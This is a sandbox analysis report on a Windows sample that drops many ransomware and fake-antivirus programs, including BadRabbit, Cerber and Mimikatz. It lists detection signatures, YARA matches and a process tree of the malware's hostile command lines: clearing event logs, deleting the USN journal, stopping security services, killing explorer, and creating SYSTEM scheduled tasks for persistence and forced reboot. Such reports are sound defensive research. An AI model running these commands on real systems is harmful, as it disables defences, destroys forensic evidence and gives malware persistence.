Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4d44bed6.exe

Overview

General Information

Sample Name:4d44bed6.exe
Analysis ID:712620
MD5:f7fad376e883d2bab82fbae91e5874f5
SHA1:76440c8a557e7c1c032f7ccb69f6f133686e8fe4
SHA256:a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6
Tags:exeRansomware
Infos:

Detection

Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Yara detected DeriaLock Ransomware
Yara detected Babuk Ransomware
System process connects to network (likely due to code injection or exploit)
Sigma detected: Execute DLL with spoofed extension
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Cerber ransomware
Antivirus / Scanner detection for submitted sample
Yara detected Mimikatz
Multi AV Scanner detection for dropped file
Yara detected InfinityLock Ransomware
Creates multiple autostart registry keys
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (window names)
Found Tor onion address
Deletes keys related to Windows Defender
PE file has a writeable .text section
Deletes keys which are related to windows safe boot (disables safe mode boot)
Clears the journal log
Machine Learning detection for sample
Clears the windows event log
Writes many files with high entropy
Connects to many different private IPs (likely to spread or exploit)
Disables security and backup related services
Tries to detect virtualization through RDTSC time measurements
Disables the windows security center
Disables the Windows registry editor (regedit)
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Opens network shares
Disables Windows system restore
Changes security center settings (notifications, updates, antivirus, firewall)
Disables the Windows task manager (taskmgr)
PE file has nameless sections
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Modifies the windows firewall
Connects to many different private IPs via SMB (likely to spread or exploit)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Deletes Internet Explorer cookies via registry
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Launches processes in debugging mode, may be used to hinder debugging
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)
Changes the start page of internet explorer
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Changes the window title of internet explorer
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Uses net.exe to stop services
PE file contains an invalid checksum
File is packed with WinRar
Detected TCP or UDP traffic on non-standard ports
Potential key logger detected (key state polling based)
Enables security privileges
Uses taskkill to terminate processes
Found evaded block containing many API calls
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)

Classification

  • System is w10x64
  • 4d44bed6.exe (PID: 5008 cmdline: "C:\Users\user\Desktop\4d44bed6.exe" MD5: F7FAD376E883D2BAB82FBAE91E5874F5)
    • 4d44bed6.exe (PID: 3684 cmdline: "C:\Users\user\Desktop\4d44bed6.exe" MD5: F7FAD376E883D2BAB82FBAE91E5874F5)
    • Endermanch@Antivirus.exe (PID: 4204 cmdline: "C:\Users\user\Desktop\Endermanch@Antivirus.exe" MD5: C7E9746B1B039B8BD1106BCA3038C38F)
      • net.exe (PID: 9360 cmdline: net stop wscsvc MD5: DD0561156F62BC1958CE0E370B23711B)
        • conhost.exe (PID: 9392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • net1.exe (PID: 9504 cmdline: C:\Windows\system32\net1 stop wscsvc MD5: B5A26C2BF17222E86B91D26F1247AF3E)
      • net.exe (PID: 9376 cmdline: net stop winmgmt /y MD5: DD0561156F62BC1958CE0E370B23711B)
        • conhost.exe (PID: 9456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net.exe (PID: 9416 cmdline: net start winmgmt MD5: DD0561156F62BC1958CE0E370B23711B)
        • conhost.exe (PID: 9512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net.exe (PID: 9496 cmdline: net start wscsvc MD5: DD0561156F62BC1958CE0E370B23711B)
        • conhost.exe (PID: 9568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • mofcomp.exe (PID: 9548 cmdline: mofcomp C:\Users\user\AppData\Local\Temp\4otjesjty.mof MD5: D8CE382C476699434A26272E8B7D5526)
    • Endermanch@AntivirusPlatinum.exe (PID: 348 cmdline: "C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe" MD5: 382430DD7EAE8945921B7FEAB37ED36B)
      • 302746537.exe (PID: 5464 cmdline: "C:\WINDOWS\302746537.exe" MD5: 8703FF2E53C6FD3BC91294EF9204BACA)
        • cmd.exe (PID: 4332 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ECFB.tmp\302746537.bat" " MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • regsvr32.exe (PID: 4920 cmdline: regsvr32 /s c:\windows\comctl32.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
          • regsvr32.exe (PID: 4148 cmdline: regsvr32 /s c:\windows\mscomctl.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
          • antivirus-platinum.exe (PID: 5248 cmdline: c:\windows\antivirus-platinum.exe MD5: CD1800322CCFC425014A8394B01A4B3D)
          • attrib.exe (PID: 5280 cmdline: attrib +h c:\windows\antivirus-platinum.exe MD5: A5540E9F87D4CB083BDF8269DEC1CFF9)
    • Endermanch@AnViPC2009.exe (PID: 240 cmdline: "C:\Users\user\Desktop\Endermanch@AnViPC2009.exe" MD5: 910DD666C83EFD3496F21F9F211CDC1F)
      • avpc2009.exe (PID: 5220 cmdline: "C:\Program Files (x86)\antiviruspc2009\avpc2009.exe" MD5: C18A7323332B3292A8E0F1C81DF65698)
    • Endermanch@BadRabbit.exe (PID: 5844 cmdline: "C:\Users\user\Desktop\Endermanch@BadRabbit.exe" MD5: FBBDC39AF1139AEBBA4DA004475E8839)
      • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 4720 cmdline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • cmd.exe (PID: 1884 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 2248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 3968 cmdline: schtasks /Delete /F /TN rhaegal MD5: 15FF7D8324231381BAD48A052F85DF04)
        • cmd.exe (PID: 4760 cmdline: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2633966292 && exit" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 5904 cmdline: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2633966292 && exit" MD5: 15FF7D8324231381BAD48A052F85DF04)
        • cmd.exe (PID: 5612 cmdline: /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:10:00 MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 3484 cmdline: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:10:00 MD5: 15FF7D8324231381BAD48A052F85DF04)
        • 3F22.tmp (PID: 4108 cmdline: "C:\Windows\3F22.tmp" \\.\pipe\{C1B24DF3-0828-43A8-B4E0-909C189DD6EB} MD5: 347AC3B6B791054DE3E5720A7144A977)
          • conhost.exe (PID: 1380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 6332 cmdline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 8248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • wevtutil.exe (PID: 9252 cmdline: wevtutil cl Setup MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)
          • wevtutil.exe (PID: 9540 cmdline: wevtutil cl System MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)
        • cmd.exe (PID: 9328 cmdline: /c schtasks /Delete /F /TN drogon MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 9368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 9560 cmdline: schtasks /Delete /F /TN drogon MD5: 15FF7D8324231381BAD48A052F85DF04)
    • Endermanch@Birele.exe (PID: 1496 cmdline: "C:\Users\user\Desktop\Endermanch@Birele.exe" MD5: 41789C704A0EECFDD0048B4B4193E752)
      • taskkill.exe (PID: 1424 cmdline: taskkill /F /IM explorer.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
        • conhost.exe (PID: 752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Endermanch@Cerber5.exe (PID: 4556 cmdline: "C:\Users\user\Desktop\Endermanch@Cerber5.exe" MD5: FE1BC60A95B2C2D77CD5D232296A7FA4)
      • netsh.exe (PID: 1320 cmdline: C:\Windows\system32\netsh.exe advfirewall set allprofiles state on MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 5836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 5264 cmdline: C:\Windows\system32\netsh.exe advfirewall reset MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Endermanch@DeriaLock.exe (PID: 3988 cmdline: "C:\Users\user\Desktop\Endermanch@DeriaLock.exe" MD5: 0A7B70EFBA0AA93D4BC0857B87AC2FCB)
    • Endermanch@FakeAdwCleaner.exe (PID: 5252 cmdline: "C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe" MD5: 248AADD395FFA7FFB1670392A9398454)
      • 6AdwCleaner.exe (PID: 6280 cmdline: "C:\Users\user\AppData\Local\6AdwCleaner.exe" MD5: 87E4959FEFEC297EBBF42DE79B5C88F6)
    • Endermanch@InfinityCrypt.exe (PID: 6352 cmdline: "C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe" MD5: B805DB8F6A84475EF76B795B0D1ED6AE)
  • cmd.exe (PID: 3136 cmdline: C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 2633966292 && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 9384 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 9468 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4652 -ip 4652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Windows\cscc.datINDICATOR_TOOL_ENC_DiskCryptorDetect DiskCryptor open encryption solution that offers encryption of all disk partitionsditekSHen
  • 0x2b3d8:$d1: \DosDevices\dcrypt
  • 0x2b488:$d2: $dcsys$_fail_%x
  • 0x2b468:$d3: %s\$DC_TRIM_%x$
  • 0x2b3b8:$d4: \Device\dcrypt
  • 0x2b420:$d5: %s\$dcsys$
C:\Windows\dispci.exeBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
  • 0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST
  • 0x14430:$x4: C:\Windows\cscc.dat
  • 0x1b1bd:$s1: need to do is submit the payment and get the decryption password.
  • 0x1f30d:$s1: need to do is submit the payment and get the decryption password.
  • 0x14500:$s2: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
  • 0x1b53f:$s5: Run DECRYPT app at your desktop after system boot
  • 0x1f68f:$s5: Run DECRYPT app at your desktop after system boot
  • 0x146ca:$s6: Files decryption completed
  • 0x145ea:$s7: Disable your anti-virus and anti-malware programs
C:\Windows\dispci.exesig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93Bad Rabbit RansomwareChristiaan Beek
  • 0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
  • 0x1b1bd:$x2: need to do is submit the payment and get the decryption password.
  • 0x1f30d:$x2: need to do is submit the payment and get the decryption password.
  • 0x1b40a:$s3: If you have already got the password, please enter it below.
  • 0x1f55a:$s3: If you have already got the password, please enter it below.
  • 0x2130c:$s4: dispci.exe
  • 0x14500:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
  • 0x1b53f:$s6: Run DECRYPT app at your desktop after system boot
  • 0x1f68f:$s6: Run DECRYPT app at your desktop after system boot
  • 0x147b8:$s7: Enter password#1:
  • 0x14676:$s8: Enter password#2:
  • 0x14430:$s9: C:\Windows\cscc.dat
  • 0x14940:$s10: schtasks /Delete /F /TN %ws
  • 0x1b448:$s11: Password#1:
  • 0x1f598:$s11: Password#1:
  • 0x14398:$s12: \AppData
  • 0x14650:$s13: Readme.txt
  • 0x14752:$s14: Disk decryption completed
  • 0x146ca:$s15: Files decryption completed
  • 0x212b4:$s16: http://diskcryptor.net/
  • 0x1b235:$s17: Your personal installation key#1:
C:\Users\user\Desktop\Endermanch@Cerber5.execerber3Cerber3 pekeinfo
  • 0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeJoeSecurity_infinitylockYara detected InfinityLock RansomwareJoe Security
    Click to see the 11 entries
    SourceRuleDescriptionAuthorStrings
    0000002E.00000000.514937121.0000000000312000.00000002.00000001.01000000.00000022.sdmpJoeSecurity_infinitylockYara detected InfinityLock RansomwareJoe Security
      00000010.00000000.472305504.0000000000448000.00000020.00000001.01000000.00000014.sdmpcerber3Cerber3 pekeinfo
      • 0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
      00000028.00000002.509874585.00007FF730B9E000.00000004.00000001.01000000.0000001F.sdmpmimikatzmimikatzBenjamin DELPY (gentilkiwi)
      • 0x10a8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74
      • 0x10b8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74
      • 0x1068:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
      00000006.00000000.534359527.0000000000401000.00000040.00000001.01000000.00000009.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        0000000F.00000003.486809681.0000000004F21000.00000004.00000800.00020000.00000000.sdmpsig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93Bad Rabbit RansomwareChristiaan Beek
        • 0x138e8:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
        • 0x1a205:$x2: need to do is submit the payment and get the decryption password.
        • 0x1e355:$x2: need to do is submit the payment and get the decryption password.
        • 0x1a452:$s3: If you have already got the password, please enter it below.
        • 0x1e5a2:$s3: If you have already got the password, please enter it below.
        • 0x20354:$s4: dispci.exe
        • 0x13548:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
        • 0x1a587:$s6: Run DECRYPT app at your desktop after system boot
        • 0x1e6d7:$s6: Run DECRYPT app at your desktop after system boot
        • 0x13800:$s7: Enter password#1:
        • 0x136be:$s8: Enter password#2:
        • 0x13478:$s9: C:\Windows\cscc.dat
        • 0x13988:$s10: schtasks /Delete /F /TN %ws
        • 0x1a490:$s11: Password#1:
        • 0x1e5e0:$s11: Password#1:
        • 0x133e0:$s12: \AppData
        • 0x13698:$s13: Readme.txt
        • 0x1379a:$s14: Disk decryption completed
        • 0x13712:$s15: Files decryption completed
        • 0x202fc:$s16: http://diskcryptor.net/
        • 0x1a27d:$s17: Your personal installation key#1:
        Click to see the 16 entries
        SourceRuleDescriptionAuthorStrings
        40.0.3F22.tmp.7ff730b90000.0.unpackBadRabbit_Mimikatz_CompAuto-generated ruleFlorian Roth
        • 0xa848:$s1: %lS%lS%lS:%lS
        • 0xa440:$s2: lsasrv
        • 0xa868:$s3: CredentialKeys
        • 0xa878:$s4: 50 72 69 6D 61 72 79 00 6D 00 73 00 76 00
        40.0.3F22.tmp.7ff730b90000.0.unpackmimikatzmimikatzBenjamin DELPY (gentilkiwi)
        • 0xcaa8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74
        • 0xcab8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74
        • 0xca68:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
        40.0.3F22.tmp.7ff730b90000.0.unpackJoeSecurity_Mimikatz_2Yara detected MimikatzJoe Security
          11.0.Endermanch@BadRabbit.exe.80000.2.unpackBadRabbit_GenDetects BadRabbit RansomwareFlorian Roth
          • 0x6114:$x3: C:\Windows\infpub.dat
          • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
          16.2.Endermanch@Cerber5.exe.400000.0.raw.unpackCerberCerber Payloadkevoreilly
          • 0x1ac8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
          Click to see the 42 entries

          Data Obfuscation

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Users\user\Desktop\Endermanch@BadRabbit.exe" , ParentImage: C:\Users\user\Desktop\Endermanch@BadRabbit.exe, ParentProcessId: 5844, ParentProcessName: Endermanch@BadRabbit.exe, ProcessCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ProcessId: 4720, ProcessName: rundll32.exe
          Timestamp:192.168.2.593.107.12.05504068932023626 09/29/22-14:52:42.658471
          SID:2023626
          Source Port:55040
          Destination Port:6893
          Protocol:UDP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5185.53.177.5349804802809804 09/29/22-14:52:51.312026
          SID:2809804
          Source Port:49804
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://searchdusty.com/avt/avt.datAvira URL Cloud: Label: malware
          Source: http://searchdusty.com/avt/avt_dbAvira URL Cloud: Label: malware
          Source: http://twinkcam.net/images/v.php?id=%advid%Avira URL Cloud: Label: malware
          Source: http://searchdusty.com/avt/avtr.datAvira URL Cloud: Label: malware
          Source: C:\Users\user\Desktop\Endermanch@Krotten.exeAvira: detection malicious, Label: TR/Sirery.A
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeAvira: detection malicious, Label: HEUR/AGEN.1224490
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeAvira: detection malicious, Label: HEUR/AGEN.1227089
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeAvira: detection malicious, Label: TR/Ransom.pfnaw
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeAvira: detection malicious, Label: TR/AD.FakeRean.mwfxa
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeAvira: detection malicious, Label: DR/Pasta.kdx
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeAvira: detection malicious, Label: JOKE/Agent.rlham
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeAvira: detection malicious, Label: TR/Dldr.FraudLoad.xerf
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeAvira: detection malicious, Label: DR/Agent.aq.122610
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeAvira: detection malicious, Label: TR/BAS.Samca.fyzpg
          Source: C:\Users\user\Desktop\Endermanch@Movie.mpeg.exeAvira: detection malicious, Label: TR/Winwebsec.akyna
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeAvira: detection malicious, Label: TR/Fake.avpc.94312
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeAvira: detection malicious, Label: TR/Genasom.wzara
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeAvira: detection malicious, Label: PUA/HappyAV.A
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeAvira: detection malicious, Label: TR/Simda.igtnk
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeAvira: detection malicious, Label: HEUR/AGEN.1230144
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeAvira: detection malicious, Label: TR/Diskcoder.ezxim
          Source: 4d44bed6.exeReversingLabs: Detection: 76%
          Source: 4d44bed6.exeVirustotal: Detection: 41%Perma Link
          Source: 4d44bed6.exeMetadefender: Detection: 25%Perma Link
          Source: 4d44bed6.exeAvira: detected
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeReversingLabs: Detection: 62%
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeMetadefender: Detection: 56%Perma Link
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeReversingLabs: Detection: 60%
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeMetadefender: Detection: 52%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeReversingLabs: Detection: 67%
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeMetadefender: Detection: 24%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeReversingLabs: Detection: 85%
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeMetadefender: Detection: 60%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeReversingLabs: Detection: 77%
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeMetadefender: Detection: 28%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeReversingLabs: Detection: 92%
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeMetadefender: Detection: 64%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeReversingLabs: Detection: 92%
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeMetadefender: Detection: 82%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeReversingLabs: Detection: 86%
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeMetadefender: Detection: 77%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeReversingLabs: Detection: 90%
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeMetadefender: Detection: 75%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeReversingLabs: Detection: 92%
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeMetadefender: Detection: 68%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeReversingLabs: Detection: 70%
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeMetadefender: Detection: 60%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeReversingLabs: Detection: 36%
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeMetadefender: Detection: 36%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeReversingLabs: Detection: 85%
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeMetadefender: Detection: 60%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeMetadefender: Detection: 64%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeReversingLabs: Detection: 85%
          Source: C:\Users\user\Desktop\Endermanch@Krotten.exeReversingLabs: Detection: 96%
          Source: C:\Users\user\Desktop\Endermanch@Krotten.exeMetadefender: Detection: 86%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@LPS2019.exeReversingLabs: Detection: 58%
          Source: C:\Users\user\Desktop\Endermanch@LPS2019.exeMetadefender: Detection: 24%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Movie.mpeg.exeReversingLabs: Detection: 95%
          Source: C:\Users\user\Desktop\Endermanch@Movie.mpeg.exeMetadefender: Detection: 80%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@NavaShield.exeReversingLabs: Detection: 51%
          Source: C:\Users\user\Desktop\Endermanch@NavaShield.exeMetadefender: Detection: 20%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@NoMoreRansom.exeReversingLabs: Detection: 90%
          Source: C:\Users\user\Desktop\Endermanch@NoMoreRansom.exeMetadefender: Detection: 72%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@PCDefender.exeReversingLabs: Detection: 70%
          Source: C:\Users\user\Desktop\Endermanch@PCDefender.exeMetadefender: Detection: 28%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exeReversingLabs: Detection: 100%
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exeMetadefender: Detection: 84%Perma Link
          Source: C:\Users\user\Desktop\Endermanch@PolyRansom.exeReversingLabs: Detection: 95%
          Source: C:\Users\user\Desktop\Endermanch@PolyRansom.exeMetadefender: Detection: 81%Perma Link
          Source: 4d44bed6.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@Krotten.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@LPS2019.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@Movie.mpeg.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeJoe Sandbox ML: detected
          Source: 13.0.Endermanch@Birele.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.0.Endermanch@BadRabbit.exe.80000.0.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 11.0.Endermanch@BadRabbit.exe.80000.1.unpackAvira: Label: TR/ATRAPS.Gen
